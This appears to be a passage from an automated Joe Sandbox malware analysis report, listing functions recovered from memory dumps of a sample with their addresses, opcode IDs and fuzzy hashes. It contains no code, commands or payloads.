                                                                                                              • Instruction Fuzzy Hash: 7D110C35F402498FEF54EFB8D954BEEBBF5EB59311F0180A6E808AB345E63099428F51
                                                                                                              Function 00DFE8E8 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1272d560b4ebf6fbfb1bfe328b781fedec4ca38bee7c5fe25d4631ae90b4f25c
                                                                                                              • Instruction ID: 5c407e8a8e5f3901a1e7ab7c3df2a671cf4ea5c6e569bca90f81763075f88db2
                                                                                                              • Opcode Fuzzy Hash: 1272d560b4ebf6fbfb1bfe328b781fedec4ca38bee7c5fe25d4631ae90b4f25c
                                                                                                              • Instruction Fuzzy Hash: 770180B4D002099FDB00EFA8D9859EEBBB1FB48304F008066D910A7324D7349A46CF90
                                                                                                              Function 00DFABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88cd6c102f719389c91a04ba11044efdbf27fde6fcb7e635ec4aab94499f9683
                                                                                                              • Instruction ID: b1e9c16eedf9c39ef3f2a05908a1ede87602a0a954db73a6f65ba5280ba1712b
                                                                                                              • Opcode Fuzzy Hash: 88cd6c102f719389c91a04ba11044efdbf27fde6fcb7e635ec4aab94499f9683
                                                                                                              • Instruction Fuzzy Hash: CEF096753107184F87259A2E9854A3AB7DEEFC8B5131F8079EA0DC7361EE21CC4287A1
                                                                                                              Function 00A8D006 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3829266485.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_a8d000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 431719660abb12b5a0faeabd0c3be5a659e29d68eaad3bd6bbe7f00d51d1cef6
                                                                                                              • Instruction ID: f10899d6eaa392c8caa77485643d2d6c5ddfec9fde017b2af824e49c0714f8ec
                                                                                                              • Opcode Fuzzy Hash: 431719660abb12b5a0faeabd0c3be5a659e29d68eaad3bd6bbe7f00d51d1cef6
                                                                                                              • Instruction Fuzzy Hash: 49014F75508780AFD7228F11CC54C62BFB9EF8666071A84CAE8868B263C235EC06CB71
                                                                                                              Function 00A8D01F Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3829266485.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_a8d000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b720d151158e95fbbd1bc0252965731898bafca905f8513c9442a69c040b8a1b
                                                                                                              • Instruction ID: 1131fa6ffd3b7c8779950e52c29daa5ad3ab29040eb17a68e372c73b3e5c06f6
                                                                                                              • Opcode Fuzzy Hash: b720d151158e95fbbd1bc0252965731898bafca905f8513c9442a69c040b8a1b
                                                                                                              • Instruction Fuzzy Hash: DBF0F976600604AF97209F0AD884C27FBBDEBC4770B55C59AE84A4B652C671EC42CFA0
                                                                                                              Function 00DF9C2C Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2c1a9a97edbd891ee60fe556ff6a4d0cdd0d231d3523c6f5b493d069647566c7
                                                                                                              • Instruction ID: 007d422d4036f8a558d285b480083402a980376efb6bcbf2802ee30332b51d8e
                                                                                                              • Opcode Fuzzy Hash: 2c1a9a97edbd891ee60fe556ff6a4d0cdd0d231d3523c6f5b493d069647566c7
                                                                                                              • Instruction Fuzzy Hash: 30F08232E001189FCB00CF699C44AEEBBE5EBC8321F15C12AEA19D3250D33149159B60
                                                                                                              Function 00DF28A2 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc007eea6f058384c66faf2ca0057191656831e17bb4f825091c4ee790139391
                                                                                                              • Instruction ID: a8d5bdd2c099500ee7d3ce48bf6320bdc022fece12fd67a9ca65e0b498730902
                                                                                                              • Opcode Fuzzy Hash: dc007eea6f058384c66faf2ca0057191656831e17bb4f825091c4ee790139391
                                                                                                              • Instruction Fuzzy Hash: 46E0DF31D24326CBC712EBB09C000FEBB74AE82322B59866BC06536190EB355658C7A1
                                                                                                              Function 00DF6739 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 02e8fb03a89a805c21c7a96b60013fbe8e8e114a466b9e2b508e77f844dae5eb
                                                                                                              • Instruction ID: ee8a873ac6597bda7b70ad39cfce09f8844020d95b83033b815f42b903fcbadb
                                                                                                              • Opcode Fuzzy Hash: 02e8fb03a89a805c21c7a96b60013fbe8e8e114a466b9e2b508e77f844dae5eb
                                                                                                              • Instruction Fuzzy Hash: D3D05E7591D341AFDB02F730BED54D43B63AA91900304D671D0098E5BADA36694FD731
                                                                                                              Function 00DF28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d6b58969de8f8bd9a576b782922a45e5c42f3cb0347afd268c3cc8564e95a96
                                                                                                              • Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
                                                                                                              • Opcode Fuzzy Hash: 7d6b58969de8f8bd9a576b782922a45e5c42f3cb0347afd268c3cc8564e95a96
                                                                                                              • Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1
                                                                                                              Function 00DF8EF6 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 845af89455b6e749d046b9bb1b8b20b49cbef91aa8bda2dd673cd550fccbee58
                                                                                                              • Instruction ID: ba1c88110809ac416802aa97e89491d902444db217700b4e95e16871a169bcdf
                                                                                                              • Opcode Fuzzy Hash: 845af89455b6e749d046b9bb1b8b20b49cbef91aa8bda2dd673cd550fccbee58
                                                                                                              • Instruction Fuzzy Hash: D0C0123350C1283EB225104E7C409B3A68DCAC53B5B264137FA5CD3200AC429C8111B5
                                                                                                              Function 00DFAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b1b374c63d5b0770685c7709f719ab3150f6faaf140e421bb62434c334228c9
                                                                                                              • Instruction ID: 384045419968b5d87af43c7a76f517b0cc30ec68c768cdbdc5313083b940d0cb
                                                                                                              • Opcode Fuzzy Hash: 5b1b374c63d5b0770685c7709f719ab3150f6faaf140e421bb62434c334228c9
                                                                                                              • Instruction Fuzzy Hash: 16D0673AB000089FDB14DF99EC409DDF776FB98221B548117EA15A3260C6319965DBA0
                                                                                                              Function 00DF6748 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4b509a402f0c72117d40b06ec64e4a1b0cf3e8ae3153269e31b05305ac511417
                                                                                                              • Instruction ID: 25641ae0e2ecf63b6d86aac44c4c8ca5faa466427978a7a7071ec1854f21fb92
                                                                                                              • Opcode Fuzzy Hash: 4b509a402f0c72117d40b06ec64e4a1b0cf3e8ae3153269e31b05305ac511417
                                                                                                              • Instruction Fuzzy Hash: BDC012354143095BDA01F771EC85555335A6BC0D107408620A0090E55DDF74694687A1

                                                                                                              Non-executed Functions

                                                                                                              Function 00DF6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3830127970.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_df0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \;q$\;q$\;q$\;q
                                                                                                              • API String ID: 0-2933265366
                                                                                                              • Opcode ID: da41d900c26a463288b83121ff052e59777f40053db3744d793296d4a7fa2cff
                                                                                                              • Instruction ID: 3877c9669797e5a9ed9f6ccc6935f8e964020fb431533f1828159894d909b727
                                                                                                              • Opcode Fuzzy Hash: da41d900c26a463288b83121ff052e59777f40053db3744d793296d4a7fa2cff
                                                                                                              • Instruction Fuzzy Hash: 45018F317001198FC7248A2DC540A3573E6EF88BA472AC16AEA46CB774DAB2DC429B60